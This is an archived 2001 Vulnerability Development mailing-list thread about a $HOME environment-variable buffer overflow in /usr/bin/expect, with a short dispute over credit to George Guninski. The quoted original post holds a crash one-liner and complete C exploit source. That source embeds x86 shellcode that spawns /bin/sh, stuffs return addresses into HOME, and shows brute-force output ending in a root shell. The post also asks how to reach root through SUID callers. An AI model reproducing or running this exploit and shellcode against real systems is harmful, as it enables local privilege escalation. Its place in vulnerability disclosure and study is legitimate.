Vulnerability Development: Re: [Returned Post...Expect overflows

[KF <dotslash () snosoft com>]

Can you refer me to the post from George which documents this? If you
are refering to
$HOME buffer overflow in SunOS 5.8 x86
Description:
There is a buffer overflow in SunOS 5.8 x86 with $HOME and /usr/bin/mail
leading to egid=mail.

If so I hardly see how I should George Credit based on only the fact
that they 
share a common variable (HOME) which happens to be unchecked... George
and I may be using 
a similar technique to find the overflow with in these applications but
I don't see
how they are related. 

On a side not I forgot to mention that Expect is SUID on Cray.
-KF



"Kevin J. Menard, Jr." wrote:

> Hey KF,
>
>     This is pretty much the same thing George Guninski reported to BugTraq.  You
>     should give people proper credit where due.
>
> --
>  Kevin
>
> Tuesday, June 05, 2001, 5:04:23 AM, you wrote:
>
> K> I have found an overflow in and coded the exploit code for several
> K> versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am
> K> unable to think of a situation where this would be useful due to the
> K> fact that expect is not suid...can anyone help me determine if this is
> K> exploitable to obtain root? Perhaps a suid expect script could be
> K> exploited? or maybe something like suid kppp which calls expect as a
> K> helper program?
>
> K> [root () linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
> K> [root () linux elguapo]# expect
> K> Segmentation fault (core dumped)
>
> K> -Kevin Finisterre
> K> dotslash () snosoft com
> K> --------------54785D81E19EEAA4D65A5A40
> K> Content-Transfer-Encoding: 7bit
> K> Content-Type: text/plain; charset=us-ascii;
> K>  name="expect.c"
> K> Content-Disposition: inline;
> K>  filename="expect.c"
>
> K> //krfinisterre () checkfree com or dotslash () snosoft com
> K> //this is output from my brute script...
> K> //722
> K> //Stack pointer: 0xbffffa18
> K> //       Offset: 0x2d3
> K> //  Return addr: 0xbffff745
> K> //stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
> K> $3
> K> $L
> K> //723
> K> //Stack pointer: 0xbffffa18
> K> //       Offset: 0x2d4
> K> //  Return addr: 0xbffff744
> K> //sh-2.04#
> K> //note that I was root when I ran this ... expect is not suid
>
> K> #define BUFFERSIZE 533
>
> K> unsigned long sp(void)
> K> {
> K>         __asm__("movl %esp, %eax");
> K> }
>
> K> int main(int argc,char **argv)
> K> {
> K>   char hell[] =
> K>         "\x29\xc0"
> K>         "\x29\xc0"
> K>         "\xb0\x47"
> K>         "\x29\xdb"
> K>         "\xb3\x0c"
> K>         "\x89\xd9"
> K>         "\xcd\x80"
> K>         "\x5e"
> K>         "\x29\xc0"
> K>         "\x88\x46\x07"
> K>         "\x89\x46\x0c"
> K>         "\x89\x76\x08"
> K>         "\xb0\x0b"
> K>         "\x87\xf3"
> K>         "\x8d\x4b\x08"
> K>         "\x8d\x53\x0c"
> K>         "\xcd\x80"
> K>         "\xe8\xe3\xff\xff\xff"
> K>         "\x2f\x62\x69\x6e\x2f\x73\x68";
> K>         int i;
> K>         int offset;
> K>         long esp;
> K>         long ret;
> K>         long *addr_ptr;
> K>         char *buffer, *ptr;
> K>         offset = atoi(argv[1]);
> K>         esp = sp();
> K>         ret = esp-offset;
>
> K>         if(!(buffer = malloc(BUFFERSIZE)))
> K>         {
> K>                 printf("oops\n");
> K>                 exit(-1);
> K>         }
>
> K>         ptr = buffer;
> K>         addr_ptr = (long *)ptr;
> K>         for (i=0; i<BUFFERSIZE; i+=4)
> K>                 *(addr_ptr++) = ret;
>
> K>         for (i=0; i<BUFFERSIZE/2; i++)
> K>                 buffer[i] = '\xeb02';
>
> K>         ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
> K>         for(i=0; i<strlen(hell); i++)
> K>                 *(ptr++) = hell[i];
>
> K>         buffer[BUFFERSIZE-1] = 0;
>
> K>         setenv("HOME", buffer, 1);
> K>         execlp("/usr/bin/expect", 0);
> K> }
>
> K> --------------54785D81E19EEAA4D65A5A40--